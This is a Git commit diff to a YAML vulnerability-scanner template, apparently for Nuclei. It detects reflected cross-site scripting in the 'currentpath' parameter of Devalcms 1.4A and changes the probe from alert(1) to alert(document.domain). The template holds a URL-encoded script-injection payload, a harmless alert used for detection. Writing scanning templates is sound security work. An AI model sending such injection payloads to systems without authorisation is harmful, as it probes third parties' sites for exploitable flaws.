Update devalcms-xss.yaml

patch-1
Ritik Chaddha 2022-07-20 14:42:25 +05:30 committed by GitHub
parent 289f1731bb
commit 4b6aa7df81
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 7 deletions

View File

@ -1,26 +1,27 @@
id: devalcms-xss id: devalcms-xss
info: info:
name: Devalcms 1.4A - Reflected Cross-Site Scripting name: Devalcms 1.4A - Cross-Site Scripting
author: arafatansari author: arafatansari
severity: medium severity: medium
reference:
- https://www.exploit-db.com/exploits/6369
description: | description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file. Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
tags: xss,unauthenticated,cms,reflected reference:
- https://www.exploit-db.com/exploits/6369
metadata:
verified: true
tags: devalcms,xss,cms
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E' - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '<script>alert(1)</script>' - 'sub menu for: <script>alert(document.domain)</script>'
- type: word - type: word
part: header part: header